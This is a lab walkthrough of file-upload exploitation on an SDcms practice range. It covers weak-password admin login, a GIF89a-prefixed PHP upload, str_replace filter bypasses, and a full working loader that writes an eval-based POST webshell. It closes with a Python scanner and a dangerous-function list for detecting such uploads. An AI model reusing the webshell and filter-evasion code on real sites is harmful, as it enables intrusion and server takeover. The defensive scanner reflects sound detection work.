Preface
This time we practiced on the SDcms practice range, which is a series of file upload vulnerability exercises. The range is as follows:
1. Find the website backend page
1. Click to log in to view the URL
As shown in the figure, the login page parameter is ?m=login.
2. Modify the URL parameters and find the backend login page
Try changing the login parameter in the above URL to admin. As shown below, this reaches the backend login page.
2. Log in to the backend management system
1. Brute forcing is not an option
The first reaction here was to brute-force the account and password, but it turned out that the application rate-limits the accessing IP: once the number of failed attempts is exceeded, login is blocked. The picture is as follows:
2. Log in using a weak password
Use the credentials admin/admin to log in to the website backend.
3. Find the file upload point
Find the file upload point as shown in the picture.
4. Upload file operation
1. Upload an ordinary image file and inspect the request
The upload path is found as shown in the figure: /upfile/2023/09/
2. Try to upload the PHP file
Change .jpg to .php in Burp, then prepend the GIF89a header to the file content; the PHP file is uploaded successfully.
Accessing the uploaded PHP file succeeds.
3. Upload a phpinfo() call to obtain system version information
The upload fails, which means there is filtering here: the phpinfo function name is filtered.
4. Bypass filtering
Use the str_replace function to bypass the filter. The method is as follows:
Bypass successful.
Open the web page to view the result.
The bypass code is as follows:
<?php
$a = str_replace("0","","p0h0p0i0n0f0o");
$a();
?>
5. Try to upload webshell
1. Notes on PHP version
As can be seen from the above, the PHP version used by the practice range is 7.4.3. This version cannot use the assert() function, so the only way to get a shell is eval, but eval cannot be invoked through the str_replace method above.
I thought of a method. Since eval cannot be bypassed using the str_replace method, why don't I use an ordinary PHP file that, when run, writes the shell file for me?
2. Try to create a file in the parent directory
As shown below, the upload failed.
After testing, it turned out that the fopen() and file_put_contents() function names were also filtered. There was no other way, so we bypassed these two functions as well. The method is as follows:
Then open the uploaded PHP file in a browser so that it runs, and check whether shell.php has been generated in the parent directory. If the
access succeeds, shell.php has been generated successfully.
3. Write the shell
Replace the $data parameter inside with the shell.
I found that the eval keyword is still detected this way. But it doesn't matter: this is just a string. We only need to split the $data content into two parts around eval, and then concatenate them again.
4. Test shell
Open the uploaded PHP file in a browser and let it run.
Then connect with the webshell tool and test:
the connection succeeds!
The final bypass code:
GIF89a
<?php
$filename = "../shell.php";
$data1 = '<?php class ok{var $arg;function setarg($x){$this->arg = "".$x.null;return $this->arg;}function setarg1($x){$this->arg = "".$this->setarg($x).null;}function go(){ev';
$data2 = 'al("$this->arg");}}$arr = array($_POST["x"]);$run = new ok;$run->setarg1($arr[0]);$run->go(); ?>';
$data = $data1.$data2;
$a = "f0o0p0e0n";
$open = str_replace("0","",$a);
$file = $open($filename,"w");
$b = "f0i0l0e_p0u0t_contents";
$write = str_replace("0","",$b);
$write($filename, $data);
fclose($file);
?>
Note: The shell here must be driven with POST; you cannot connect with AntSword using GET.
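From the defender's side, the two upload bodies shown above share a few recognisable traits: a GIF89a header followed by a PHP open tag, str_replace calls that rebuild a function name from a padded string, variable function calls such as $a(), string literals that only spell eval once joined, and a path that climbs out of the upload directory. The following scanner is an added example (not code from the original post or from SDcms) that flags each of these; the sample bodies are constructed and condensed from the payloads on this page, and the finding strings are my own.

```python
import re

# Function names that should never be rebuilt inside an "image" upload.
DANGEROUS = ("eval", "assert", "system", "shell_exec", "passthru", "exec",
             "phpinfo", "fopen", "file_put_contents")

# $name = "literal";  (assumption: only double-quoted scalars are tracked)
ASSIGN_RE = re.compile(r'\$(\w+)\s*=\s*"([^"]*)"\s*;')
# str_replace("x", "", "lit")  or  str_replace("x", "", $var)
STR_REPLACE_RE = re.compile(
    r'str_replace\(\s*"([^"]*)"\s*,\s*"([^"]*)"\s*,\s*(?:"([^"]*)"|\$(\w+))\s*\)')
# every single- or double-quoted PHP string literal, in source order
LITERAL_RE = re.compile(r"'((?:[^'\\]|\\.)*)'|\"((?:[^\"\\]|\\.)*)\"")
# variable function call such as $a() or $open($filename, "w")
VARCALL_RE = re.compile(r"\$\w+\s*\(")


def scan_upload(body: bytes) -> list[str]:
    """Return findings for one uploaded file body; [] means nothing suspicious."""
    text = body.decode("latin-1")          # lossless for arbitrary bytes
    findings = []
    if text.startswith("GIF89a") and "<?php" in text:
        findings.append("polyglot: GIF89a header followed by <?php")
    scalars = dict(ASSIGN_RE.findall(text))
    for search, repl, lit, var in STR_REPLACE_RE.findall(text):
        subject = lit if lit else scalars.get(var, "")
        rebuilt = subject.replace(search, repl)     # undo the padding trick
        if rebuilt in DANGEROUS:
            findings.append(f"str_replace rebuilds {rebuilt}()")
    if VARCALL_RE.search(text):
        findings.append("variable function call $name(...)")
    # Joining literals in source order turns 'ev' + 'al(' back into eval(
    joined = "".join(a or b for a, b in LITERAL_RE.findall(text))
    for name in DANGEROUS:
        if re.search(rf"\b{name}\s*\(", joined):
            findings.append(f"split literals reassemble {name}(")
    if "../" in joined:
        findings.append("path escapes the upload directory")
    return findings


# Constructed samples modelled on the two payloads discussed on this page.
PHPINFO_SAMPLE = b'GIF89a\n<?php\n$a = str_replace("0","","p0h0p0i0n0f0o");\n$a();\n?>'
SHELL_SAMPLE = (b'GIF89a\n<?php\n$filename = "../shell.php";\n'
                b"$data1 = '<?php function go($x){ev';\n"
                b"$data2 = 'al(\"$x\");} go($_POST[\"x\"]); ?>';\n"
                b'$a = "f0o0p0e0n"; $open = str_replace("0","",$a);\n'
                b'$file = $open($filename,"w");\n'
                b'$b = "f0i0l0e_p0u0t_contents"; $write = str_replace("0","",$b);\n'
                b'$write($filename, $data1.$data2); fclose($file);\n?>')
CLEAN_GIF = b"GIF89a\x01\x00\x01\x00\x80\x00\x00"   # a real image header, no PHP
```

Run scan_upload over each stored upload body (or over the raw multipart body at the upload handler) and reject or quarantine anything that returns a non-empty list; a genuine image never contains a PHP open tag.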